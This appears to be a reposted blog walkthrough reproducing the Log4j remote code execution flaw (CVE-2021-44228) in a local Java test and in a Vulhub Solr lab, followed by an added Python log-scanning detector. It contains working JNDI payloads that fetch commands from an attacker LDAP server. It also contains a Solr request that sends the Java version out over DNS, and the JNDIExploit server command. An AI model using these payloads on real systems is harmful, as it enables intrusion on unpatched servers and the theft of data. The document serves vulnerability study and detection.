Vulnerability reproduction log4j RCE (CVE-2021-44228)

Preface: The conditions for using Log4j are really harsh. After watching a lot of videos and articles, I recorded two scenarios that I can reproduce.

For some reason, the Windows system has no response for a long time and can only print to the console. 360 has detected Log4j, but even if you exit 360 there is no command execution, which is far from the big picture.

1、kali

  • Java environment: 1.8.0_281. This JDK version is already very high, so the issue cannot be reproduced as-is in a real environment; the core lies in System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true");
  • Download two jar packages: log4j-core-2.14.1.jar and log4j-api-2.14.1.jar
// Log4jTest.java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Log4jTest {
    private static final Logger logger = LogManager.getLogger();

    public static void main(String[] args) {
        // Re-enable remote codebase loading, which recent JDKs disable by default
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        // The Base64 segment decodes to: touch /tmp/success
        String jndi_exploit = "${jndi:ldap://192.168.137.1:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9zdWNjZXNzCg==}";
        // Logging the string triggers the JNDI lookup in Log4j 2.14.1
        logger.error(jndi_exploit);
    }
}

Compile and run

javac -cp log4j-core-2.14.1.jar:log4j-api-2.14.1.jar:$CLASSPATH Log4jTest.java
java -cp log4j-core-2.14.1.jar:log4j-api-2.14.1.jar:$CLASSPATH Log4jTest

On the attacker host (IP 192.168.137.1), use the JNDIExploit tool to attack:

java8 -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.137.1

2、vulhub

Use vulhub to create the containers for CVE-2021-44228.

This environment is very harmonious, without any problems; it succeeded on the first try.

Because Log4j is not a separate web service but a logging library, this environment is Apache Solr 8.11.0, which uses Log4j 2.14.1.

After the service starts, visit http://your-ip:8983 to see the admin portal of Apache Solr.

/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.hw5t79.dnslog.cn}

If you check the records on the dnslog platform, you can see that I am using java8u74, and the information has been taken out.
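To spot requests like the one above in Solr or proxy access logs, the following added example (not part of the original post) percent-decodes each line and extracts `${jndi:...}` expressions together with any nested lookups such as `${sys:java.version}`. The log lines, IP addresses and the `example.invalid` host are constructed for the example.

```python
import re
from urllib.parse import unquote

# Start of a JNDI lookup, e.g. ${jndi:ldap://
JNDI_START = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://", re.IGNORECASE)
# A nested lookup inside the JNDI URL, e.g. ${sys:java.version}
NESTED = re.compile(r"\$\{([a-z]+):([^${}]+)\}", re.IGNORECASE)

# Constructed access-log lines (not taken from a real system)
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2022:10:00:00 +0000] "GET /solr/admin/cores?action=STATUS HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2022:10:00:05 +0000] "GET /solr/admin/cores?action='
    '%24%7Bjndi%3Aldap%3A%2F%2F%24%7Bsys%3Ajava.version%7D.example.invalid%7D HTTP/1.1" 400 120',
    '10.0.0.9 - - [01/Jan/2022:10:00:09 +0000] "GET /solr/admin/cores?action='
    '${jndi:ldap://192.0.2.10:1389/a} HTTP/1.1" 400 120',
]

def _balanced(text, start):
    """Return the ${...} expression beginning at text[start], honouring nested braces."""
    depth, i = 0, start
    while i < len(text):
        if text.startswith("${", i):
            depth += 1
            i += 2
            continue
        if text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[start:i + 1]
        i += 1
    return text[start:]  # unterminated expression: keep the tail for the analyst

def find_jndi_lookups(line):
    """Return one dict per ${jndi:...} expression found in a log line."""
    decoded = line
    for _ in range(3):  # undo up to three layers of percent-encoding
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    hits = []
    for m in JNDI_START.finditer(decoded):
        expr = _balanced(decoded, m.start())
        inner = expr[len(m.group(0)):]
        nested = [f"{p.lower()}:{k}" for p, k in NESTED.findall(inner)]
        hits.append({"expression": expr, "scheme": m.group("scheme").lower(), "nested": nested})
    return hits

if __name__ == "__main__":
    for n, line in enumerate(SAMPLE_LOG, 1):
        for hit in find_jndi_lookups(line):
            print(n, hit)
```

The pattern matches only the literal `${jndi:` form shown on this page, so a clean result is one signal and not proof that no lookup was attempted.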

Origin blog.csdn.net/m0_52062236/article/details/130919041